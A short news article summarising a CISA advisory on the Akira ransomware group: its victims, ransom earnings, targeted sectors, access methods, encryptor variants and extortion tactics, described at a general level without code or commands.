A recent advisory from the Cybersecurity and Infrastructure Security Agency highlights the growing threat of the Akira ransomware group, which has rapidly become one of the most aggressive cybercrime operations targeting global businesses.
Ransomware Impact and Financial Losses
Since March 2023, Akira has compromised more than 250 organizations across North America, Europe, and Australia. According to the agency, the group collected approximately 244.17 million dollars in ransom payments by the end of September 2025.
Researchers have linked this threat group to the previously active Conti ransomware operation. Akira mainly focuses on small and medium sized organizations across multiple sectors, making it a high risk threat for companies with limited security budgets.
Targeted Sectors and Initial Access Methods
Akira shows a clear preference for industries that include manufacturing, education, information technology, healthcare, and financial services.
The attackers typically gain initial access through virtual private network services that lack multi factor authentication, and by exploiting known vulnerabilities in Cisco products.
Security analysts from CISA observed that Akira threat actors continued to refine and improve their techniques throughout 2024 and 2025.
Evolution of Akira Ransomware Variants
Akira was first discovered as a Windows based C plus plus encryptor that added the .akira extension to affected files.
By April 2023, the group launched a Linux variant targeting VMware ESXi servers. A few months later, in August 2023, they released the Megazord encryptor, a Rust based version that appended the .powerranges extension.
In June 2025, Akira operators exploited CVE 2024 40766, a SonicWall flaw, which enabled them to encrypt Nutanix AHV virtual machine disk files.
Akira uses a hybrid encryption technique that combines the ChaCha20 stream cipher with RSA public key encryption to achieve high speed file encryption and secure key handling.
Double Extortion and Persistence Techniques
The ransomware follows a double extortion strategy in which victims face both file encryption and threats of public data exposure.Once inside a network, the attackers establish persistence by creating new domain accounts and using credential harvesting tools like Mimikatz and LaZagne to steal passwords.They also rely on legitimate remote access programs such as AnyDesk and LogMeIn to maintain long term access without raising suspicion.
For data theft, Akira operators use tools like FileZilla, WinSCP, and RClone to transfer sensitive information to cloud storage platforms before launching encryption activities.To block system recovery, the malware uses PowerShell commands to remove Volume Shadow Copy Service backups on Windows devices.Victims receive ransom notes named fn.txt or akira_readme.txt, which direct them to a .onion site through the Tor network, where payments are demanded in Bitcoin.
